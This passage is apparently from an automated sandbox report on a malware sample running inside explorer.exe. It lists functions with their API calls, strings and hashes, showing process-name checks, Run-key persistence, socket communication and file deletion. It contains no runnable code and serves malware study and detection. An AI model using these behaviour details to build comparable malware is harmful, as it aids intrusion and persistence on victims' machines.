                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameWindows_errno_invalid_parameter_noinfolstrcmpi
                                                                                                            • String ID: %s\explorer.exe
                                                                                                            • API String ID: 3179574994-2893622748
                                                                                                            • Opcode ID: 1bfc62fb89f389df5371351b6afc47bdc54bf83d483249f57838a729e97ffc8f
                                                                                                            • Instruction ID: 98b7edbd06f63b31ef03c0c9639dd92d0b14295bc4cf3f9418c714405503d16e
                                                                                                            • Opcode Fuzzy Hash: 1bfc62fb89f389df5371351b6afc47bdc54bf83d483249f57838a729e97ffc8f
                                                                                                            • Instruction Fuzzy Hash: C621E025214A8182E7349F11F99872A6761FBC8B95F041535FA8E677B9CF7CC68DCB00
                                                                                                            Function 00E09D70 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 57memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem_errno_invalid_parameter_noinfolstrcmpi
                                                                                                            • String ID: %s\svchost.exe
                                                                                                            • API String ID: 3414592467-1955667316
                                                                                                            • Opcode ID: 12c6d49865847895082e34bbceefa938f95d4aec89c943a0a90385de397a9df5
                                                                                                            • Instruction ID: 914fadf0504b7118c286a5181722094d96048c3d53ecc37914ec61d4c3dcc509
                                                                                                            • Opcode Fuzzy Hash: 12c6d49865847895082e34bbceefa938f95d4aec89c943a0a90385de397a9df5
                                                                                                            • Instruction Fuzzy Hash: D721E025214A8182E7349F11F95832A67A1FBC8B94F001535FA8E677B9CF3CCA8DCB00
                                                                                                            Function 00E09E90 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 57memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem_errno_invalid_parameter_noinfolstrcmpi
                                                                                                            • String ID: %s\cmd.exe
                                                                                                            • API String ID: 3414592467-923833829
                                                                                                            • Opcode ID: 5af63fee73b885e983a171c554cd543ac2bb57c3c5edb473cb41feac39bf807e
                                                                                                            • Instruction ID: f854b7c7659556737845e7664cc960dd496bff86bfd05fc766787175783583c9
                                                                                                            • Opcode Fuzzy Hash: 5af63fee73b885e983a171c554cd543ac2bb57c3c5edb473cb41feac39bf807e
                                                                                                            • Instruction Fuzzy Hash: BD21CD25214A8182E7349F11F95872A6761FBC8B95F041535FA8EA7AB9CF7CC68DCB00
                                                                                                            Function 00E251B0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 255stringnetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32 ref: 00E251ED
                                                                                                              • Part of subcall function 00E257B0: CoInitializeEx.COMBASE ref: 00E257DA
                                                                                                              • Part of subcall function 00E257B0: CoCreateGuid.COMBASE ref: 00E257ED
                                                                                                              • Part of subcall function 00E257B0: StringFromGUID2.COMBASE ref: 00E2580B
                                                                                                              • Part of subcall function 00E257B0: wsprintfA.USER32 ref: 00E2582D
                                                                                                              • Part of subcall function 00E257B0: LocalAlloc.KERNEL32 ref: 00E2583D
                                                                                                              • Part of subcall function 00E257B0: und_memcpy.LIBCMTD ref: 00E258B4
                                                                                                              • Part of subcall function 00E257B0: LocalFree.KERNEL32 ref: 00E258C1
                                                                                                              • Part of subcall function 00E257B0: CoUninitialize.COMBASE ref: 00E258C7
                                                                                                            • setsockopt.WS2_32 ref: 00E252EC
                                                                                                            • LocalFree.KERNEL32 ref: 00E25772
                                                                                                              • Part of subcall function 00E24740: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00E2477F
                                                                                                              • Part of subcall function 00E259A0: LocalAlloc.KERNEL32 ref: 00E259B1
                                                                                                              • Part of subcall function 00E259A0: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00E255BD), ref: 00E259CF
                                                                                                              • Part of subcall function 00E259A0: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00E255BD), ref: 00E259E7
                                                                                                              • Part of subcall function 00E24C90: WSACreateEvent.WS2_32 ref: 00E24D29
                                                                                                            • LocalFree.KERNEL32 ref: 00E25764
                                                                                                              • Part of subcall function 00E24740: WSACreateEvent.WS2_32 ref: 00E247D9
                                                                                                            • CreateEventW.KERNEL32 ref: 00E256E0
                                                                                                            • WSAEventSelect.WS2_32 ref: 00E2570F
                                                                                                            • und_memcpy.LIBCMTD ref: 00E2573F
                                                                                                            • CloseHandle.KERNEL32 ref: 00E25756
                                                                                                            • shutdown.WS2_32 ref: 00E25785
                                                                                                            • closesocket.WS2_32 ref: 00E25793
                                                                                                              • Part of subcall function 00E25BB0: LocalAlloc.KERNEL32 ref: 00E25BC1
                                                                                                              • Part of subcall function 00E25BB0: lstrcpyW.KERNEL32 ref: 00E25C05
                                                                                                              • Part of subcall function 00E25BB0: GetModuleFileNameW.KERNEL32 ref: 00E25C25
                                                                                                              • Part of subcall function 00E25BB0: LocalFree.KERNEL32 ref: 00E25C34
                                                                                                              • Part of subcall function 00E24C90: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00E24CCF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$CreateEventTimer$Alloc$ChangeConcurrency::details::platform::__Queueund_memcpy$CloseFileFromGuidHandleInitializeLibraryLoadModuleNameSelectStringUninitializeclosesocketlstrcpylstrlensetsockoptshutdownwsprintf
                                                                                                            • String ID: 8
                                                                                                            • API String ID: 1160820747-4194326291
                                                                                                            • Opcode ID: 7744c4e00b3501b588a20af34e49b89a779c10dbf6e343e0beb01c25e0c734aa
                                                                                                            • Instruction ID: 79d79704b3250ba30c26988c4230c6c96b23341ccf88b598589b0ce8812e1e49
                                                                                                            • Opcode Fuzzy Hash: 7744c4e00b3501b588a20af34e49b89a779c10dbf6e343e0beb01c25e0c734aa
                                                                                                            • Instruction Fuzzy Hash: F6D1DF76218BD08AE7709B15F5443DAB7A4F388798F80152AEA8D53B68DF7DC684CF40
                                                                                                            Function 00E1C1F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63windowregistryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister
                                                                                                            • String ID: {3423A12F-92CE-4AE6-962F-DE5D526886C1}
                                                                                                            • API String ID: 1237952354-437755030
                                                                                                            • Opcode ID: fca36edf4844be4939544b6fc52ab05d3dda8d3151a5665033656b6385d46372
                                                                                                            • Instruction ID: 4c6f57aad7f051d7163fbf85257d53b6e56feea1ac6a72a8baa26b871eec4403
                                                                                                            • Opcode Fuzzy Hash: fca36edf4844be4939544b6fc52ab05d3dda8d3151a5665033656b6385d46372
                                                                                                            • Instruction Fuzzy Hash: 1C314D31114BC4D6F7208F25F8A879A77B4F394784F605925E58AA3AB4DF7DC188CB00
                                                                                                            Function 00E17980 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63windowregistryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister
                                                                                                            • String ID: {9C8B46D6-3D59-421D-A2D1-8F95C9197AC8}
                                                                                                            • API String ID: 1237952354-1830929042
                                                                                                            • Opcode ID: f849f3a4336449fa9ac388813d7629770bd7ad0e1afa6c6fa8222e9ffe5ab2fa
                                                                                                            • Instruction ID: d11c4de23a7406d8dd82b2e7a4bc542e173944fc82734a4d91ded007bb3d4642
                                                                                                            • Opcode Fuzzy Hash: f849f3a4336449fa9ac388813d7629770bd7ad0e1afa6c6fa8222e9ffe5ab2fa
                                                                                                            • Instruction Fuzzy Hash: 35314A75119BC5C6E7208F10F95879E77B0F7A4784F501A26D68AA3AB4DF3EC588CB00
                                                                                                            Function 00E24740 Relevance: 16.7, APIs: 11, Instructions: 234timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00E2477F
                                                                                                              • Part of subcall function 00E23370: recv.WS2_32 ref: 00E2339C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Timer$ChangeConcurrency::details::platform::__Queuerecv
                                                                                                            • String ID:
                                                                                                            • API String ID: 2709879575-0
                                                                                                            • Opcode ID: 002381c08185e5a16537f8a3cffd139b2132a009f6dbad97a70fce292a30c3fc
                                                                                                            • Instruction ID: abbd631c391b567cece35dbd94e67c1a47eda074bba6a03cb62696b0b593d4e9
                                                                                                            • Opcode Fuzzy Hash: 002381c08185e5a16537f8a3cffd139b2132a009f6dbad97a70fce292a30c3fc
                                                                                                            • Instruction Fuzzy Hash: 7EC1E3B26097D4CAE774CB19F0957EAB7A1F3C8748F10511ADA8A97B98CB79C484CF01
                                                                                                            Function 00E24C90 Relevance: 16.7, APIs: 11, Instructions: 228timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00E24CCF
                                                                                                              • Part of subcall function 00E233B0: send.WS2_32 ref: 00E233DC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Timer$ChangeConcurrency::details::platform::__Queuesend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1596855159-0
                                                                                                            • Opcode ID: a14449d47bcc732b4026f4a8e1815cb31c5e400aa0fa59b0bbadee9f018b8fd0
                                                                                                            • Instruction ID: 500b9f71e6a9e56fa0b3ff880486b3bf436b8342aaf4e555c6e557f34efc8f67
                                                                                                            • Opcode Fuzzy Hash: a14449d47bcc732b4026f4a8e1815cb31c5e400aa0fa59b0bbadee9f018b8fd0
                                                                                                            • Instruction Fuzzy Hash: 3DC1E372609BD0CAD770CB19F5847EAB7A1F7C8748F10911ADA8A97B98CB79C494CF01
                                                                                                            Function 00E09070 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 00E0909E
                                                                                                            • GetWindowsDirectoryW.KERNEL32 ref: 00E090D7
                                                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00E09110
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • StrCmpIW.SHLWAPI ref: 00E091E8
                                                                                                            • StrCmpIW.SHLWAPI ref: 00E091FF
                                                                                                            • StrCmpIW.SHLWAPI ref: 00E09216
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FileModuleNameSystemWindows_errno_invalid_parameter_noinfo
                                                                                                            • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                                                                                                            • API String ID: 4125122012-2596767422
                                                                                                            • Opcode ID: c456c09313bfc01ec283db73f2b66220511faa922ff89db487c5000120ef8833
                                                                                                            • Instruction ID: dc8b7ce728c7f3aaad763f60797fa76bcf7071db3ccdc80b74e8f5269988c076
                                                                                                            • Opcode Fuzzy Hash: c456c09313bfc01ec283db73f2b66220511faa922ff89db487c5000120ef8833
                                                                                                            • Instruction Fuzzy Hash: C5410F21314AC4A6D770DB34F9943DB63A2F788744F805536868DD3AA9EF3DC658CB44
                                                                                                            Function 00E0F370 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 30registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 00E0F3C5
                                                                                                            • {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 00E0F3DD
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00E0F382
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run${AB1F3E47-AEF1-400E-A108-233A046C3A34}
                                                                                                            • API String ID: 849931509-2070010218
                                                                                                            • Opcode ID: 18b7775432b7624f2f27483179afdce4d241ea27d62cc07b0c6b43f001c51a34
                                                                                                            • Instruction ID: 79c55dd891e6d4413b57571926cadc4718e1e349e0a95617100c7c27fbbb7542
                                                                                                            • Opcode Fuzzy Hash: 18b7775432b7624f2f27483179afdce4d241ea27d62cc07b0c6b43f001c51a34
                                                                                                            • Instruction Fuzzy Hash: 50012C76210AC082EA209F11FD543557324FBE47A9F801B26DA9E626F8DF3DC649C710
                                                                                                            Function 00E0F510 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78stringmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SHGetKnownFolderPath.SHELL32 ref: 00E0F587
                                                                                                            • lstrlenW.KERNEL32 ref: 00E0F59A
                                                                                                            • lstrlenW.KERNEL32 ref: 00E0F5B5
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E0F5DC
                                                                                                            • CoTaskMemFree.COMBASE ref: 00E0F647
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • lstrlenW.KERNEL32 ref: 00E0F620
                                                                                                            • CoTaskMemFree.COMBASE ref: 00E0F635
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$FreeTask$AllocFolderKnownLocalPath_errno_invalid_parameter_noinfo
                                                                                                            • String ID: %s\%s\
                                                                                                            • API String ID: 2748012262-2168696002
                                                                                                            • Opcode ID: 3cca972c16843a3f2efd62632e49bbe6d0520c0f8e1cd0dcd88a84282803a08c
                                                                                                            • Instruction ID: a357c05f0ef9d8e94ff518ae0fbd8aa22afb51293a05364cc6489e10a2aeb621
                                                                                                            • Opcode Fuzzy Hash: 3cca972c16843a3f2efd62632e49bbe6d0520c0f8e1cd0dcd88a84282803a08c
                                                                                                            • Instruction Fuzzy Hash: 38312B32208A8486DB54DB25F95436AB7B1F7C9B84F504421EB8E93B68DF7DC999CB00
                                                                                                            Function 00E0FA60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E0F510: SHGetKnownFolderPath.SHELL32 ref: 00E0F587
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F59A
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F5B5
                                                                                                              • Part of subcall function 00E0F510: LocalAlloc.KERNEL32 ref: 00E0F5DC
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F620
                                                                                                              • Part of subcall function 00E0F510: CoTaskMemFree.COMBASE ref: 00E0F635
                                                                                                            • GetFileAttributesW.KERNEL32 ref: 00E0FB60
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • DeleteFileW.KERNEL32 ref: 00E0FB1A
                                                                                                            • RemoveDirectoryW.KERNEL32 ref: 00E0FB2D
                                                                                                            • LocalFree.KERNEL32 ref: 00E0FB40
                                                                                                            • LocalFree.KERNEL32 ref: 00E0FB55
                                                                                                            • GetFileAttributesW.KERNEL32 ref: 00E0FB77
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
